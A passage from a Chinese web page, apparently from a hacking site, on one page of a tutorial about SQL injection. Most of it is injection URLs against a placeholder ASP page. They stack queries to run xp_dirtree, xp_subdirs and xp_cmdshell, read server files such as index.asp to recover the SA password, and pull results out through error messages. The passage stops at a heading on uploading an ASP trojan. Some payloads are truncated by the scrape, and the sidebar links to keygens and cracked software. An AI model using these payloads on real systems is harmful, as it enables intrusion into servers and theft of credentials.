什么是SQL注入法攻击

• 二是遍历系统的目录结构，分析结果并发现WEB虚拟目录；
  先创建一个临时表：temp
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
  接下来：
  （1）我们可以利用xp_availablemedia来获得当前所有驱动器,并存入temp表中：
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
  我们可以通过查询temp的内容来获得驱动器列表及相关信息
  （2）我们可以利用xp_subdirs获得子目录列表,并存入temp表中：
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:\';--
  （3）我们还可以利用xp_dirtree获得所有子目录的目录树结构,并寸入temp表中：
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--
  这样就可以成功的浏览到所有的目录（文件夹）列表：

  如果我们需要查看某个文件的内容，可以通过执行xp_cmdsell：
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type c:\web\index.asp';--
  使用'bulk insert'语法可以将一个文本文件插入到一个临时表中。如：bulk insert temp(id) from 'c:\inetpub\wwwroot\index.asp'
  浏览temp就可以看到index.asp文件的内容了！通过分析各种ASP文件，可以得到大量系统信息，WEB建设与管理信息，甚至可以得到SA帐号的连接密码。

  当然，如果xp_cmshell能够执行，我们可以用它来完成：
  
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell 'dir c:\';--
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell 'dir c:\ *.asp /s/a';--

  通过xp_cmdshell我们可以看到所有想看到的，包括W3svc
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ub\AdminScripts\adsutil.vbs enum w3svc'

  但是，如果不是SA权限，我们还可以使用
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';--

  注意：
  1、以上每完成一项浏览后，应删除TEMP中的所有内容，删除方法是：
  HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
  2、浏览TEMP表的方法是：(假设TestDB是当前连接的数据库名)
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一条记录id字段的值，并与整数进行比较，显然abc.asp工作异常，但在异常中却可以发现id字段的值。假设发现的表名是xyz，则
  HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 得到表TEMP中第二条记录id字段的值。

  五、上传ASP木马
  

• 上一页 [1] [2] [3] [4] [5] [6] [7] [8] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 什么是SQL注入法攻击 相关文章：
• ·asp代码-注册登陆代码
• ·注册表修改大全之XP
• ·2005 最新注册码大全
• ·注册表知识：HKEY_LOCAL_MACHINE根键详解
• ·Coreldraw12官方简体中文版下载及注册码
• ·注册表应用100例—注册表使用全攻略之十一
• ·软件注册码、安装序列号☆集锦
• ·什么是SQL注入法攻击
• ·在jsp中用bean和servlet联合实现用户注册、登录
• ·cmd下修改注册表完全攻略
• 什么是SQL注入法攻击 相关软件
• ·VirtuaGirl 虚拟女孩 V2.08 汉化注册版
• ·注册码生成器 V1.0
• ·COCO电脑监控系统 V 7.66 注册版
• ·统一驾照模拟考试系统v3.0　驾校版　+　注册机
• ·儿童经典诵读—名篇精品欣赏注音读本（专家朗诵版） V3.0.8.8
• ·注册表修改工具 V4.0
• ·Fraps游戏录影 注册版
• ·《实况足球9欧洲版》全系列注册表导入器
• ·理正电气 CAD Build 20612 免费注册版
• ·RegFix注册表关键键值修复工具 V1.21

上一篇:jsp实现图形验证码

下一篇:Photoshop一种反转片效果的制作方法

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐